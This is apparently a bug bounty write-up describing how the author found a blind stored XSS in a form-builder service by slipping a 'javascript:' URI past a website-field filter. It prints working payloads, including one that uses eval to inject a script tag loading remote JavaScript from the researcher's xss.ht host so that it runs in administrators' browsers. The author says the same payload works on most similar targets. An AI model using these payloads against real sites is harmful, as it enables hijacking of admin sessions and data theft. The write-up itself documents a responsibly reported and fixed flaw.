Hack Your Form-New vector for Blind XSS

Hello Pentesters,

I’m Youssef A. Mohamed aka GeneralEG
 
Security Researcher @CESPPA , Cyber Security Engineer @Squnity and SRT Member @Synack

  • Today I’m gonna share a juicy finding with you.

Talking about bypassing a couple of filters to execute malicious javascript codes easily and achieve a Blind Stored XSS.

“I found this issue in a lot of targets so, I will take one of these programs as an example.”

The program is private so let’s call it redacted.com

  • Recently I was testing in this program and after some recon, I found that the website offers a specific service (Create Forms).

How does this service work?
1)Creator User create a form
2)Creator User share the link with visitor
3)Visitor fill the form
4)The filled information will be available for the Form’s Creator at redacted.com/manager/{Form ID}/

So while testing the “Creating form” functions, I’ve found that there’s a Website input

I made a simple form.

Then opened as the form as a visitor.

At the first I tried to bypass it as the basic style:
(thought that if I wrote website.com?” payload it will execute)

So, I entered:
https://example.com/?"%22"

( “ + url encoded + html entities encoded)

Then opened the creator account to see what happened.

But unfortunately, the filter encoded the double quotes.
https://example.com"%22"

and noticed that the Link rendered in (a tag)

So, I decided to grab a cup of coffee :”D

  • After a few minutes of deep thinking while drinking my coffee about how I will bypass this one.

I decided to start fuzzing in this input especially.. {Enter Website}

While I’m fuzzing I noticed that the filter accepted test:https://example.com !

then tried javascript:https//evil.com
and it worked :D
“Evil loud laugh”

  • Now I’m sure that there’s XSS here
    but it’s need real website merged with my payload so i wrote this one.

javascript:x=’http://x.c';alert('xss');//

Finally executed!

  • But wait we want to make it Blind XSS to attack the real admins (The best scenario).

So the last payload was:

javascript:eval(‘a=document.createElement(\’script\’);a.src=\’https://generaleg.xss.ht\';document.body.appendChild(a)');s='https://s.com'

¯\_(ツ)_/¯

That’s it!

Notes:

  • 80% of my targets which have the Website’s input was vulnerable to the same scenario.
  • To make sure that your target is vulnerable to the same problem you need a few steps to make sure:

A. Check if the website is accepting other URI scheme like javascript:https://generaleg0x01.com or not?

B. Check if the website is rendering your https://generaleg0x01.com on HTML ‘a’ tag or not?

  • And in the most similar situations, the same payload will work perfectly.

Timeline:
20 December, 2018: Report Submitted
25 December, 2018: Report Reviewed and Triaged
30 December, 2018: Report Resolved & 800$ Bounty Awarded

Learned lessons:

  • Fuzz as much as you can.
  • Don’t try one technique to bypass the filter to try other techniques.

Happy Hacking!